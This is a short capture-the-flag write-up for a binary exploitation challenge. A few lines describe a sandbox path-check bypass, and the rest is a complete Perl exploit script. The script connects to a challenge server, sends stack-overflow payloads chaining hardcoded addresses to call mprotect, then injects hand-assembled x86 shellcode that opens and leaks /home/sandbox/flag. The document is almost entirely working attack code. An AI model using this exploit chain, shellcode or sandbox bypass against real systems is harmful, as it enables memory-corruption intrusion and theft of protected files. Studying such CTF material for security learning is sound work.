Tags: bin
Rating:
Exploit warmup, make rwx memory using mprotect to write shellcode,
use mmap() to create only readable memory, read /home/sandbox/flag into it, and call open(), read(), write().
The sandbox will try to validate the path using process_vm_readv() but it'll just fail, causing realpath() to fail too and
thus bypass the path check.
-- @_cutz
use cutztools;
$sock = new sock("202.120.7.207", 52608);
# prepare stack
print $sock->readline();
$sock->print(
"B"x32 .
p32(0x080480D8) . # start
p32(0x1000) . # pagesize
p32(7)x3 # prot
);
print $sock->readline();
# prepare more stack
print $sock->readline();
$sock->print(
"A"x32 .
p32(0x080480D8) . # start
"A"x4 .
p32(0x08048122) . # syscall
p32(0x08049000) . # bss
p32(0x08049000)
);
print $sock->readline();
# more
for (1 .. 2) {
print $sock->readline();
$sock->print(
"B"x32 .
p32(0x080480D8) .
"B"x16
);
print $sock->readline();
}
print $sock->readline();
$sock->print(
"B"x32 .
p32(0x0804811D) . # read
p32(0x080481B8) . # add esp, 0x30
p32(0) . # stdin
p32(0x08049000) . # bss
p32(125) # 125 -> mprotect
);
print $sock->readline();
$assembler = new assembler();
$assembler->assemble32('
_start:
movl $90, %eax
movl $0x08049500, %ebx
movl $0x13370000, (%ebx)
movl $0x2000, 4(%ebx)
movl $2, 8(%ebx)
movl $0x32, 12(%ebx)
int $0x80
movl $3, %eax
xorl %ebx, %ebx
movl $0x13370000, %ecx
movl $0xff, %edx
loop:
movl $3, %eax
int $0x80
addl $0xff, %ecx
cmp $0xff, %eax
je loop
movl $0x13370000, %ebx
movl $5, %eax
xorl %ecx, %ecx
int $0x80
movl %eax, %esi
read:
movl %esi, %ebx
movb $3, %al
subl $1, %esp
lea (%esp), %ecx
movb $25, %dl
int $0x80
movl $4, %eax
movl $1, %ebx
movl $25, %edx
int $0x80
');
$shellcode = $assembler->raw();
$sock->print($shellcode . "A"x(125-length $shellcode) . "/home/sandbox/flag\x00");
print $sock->readnum(1024);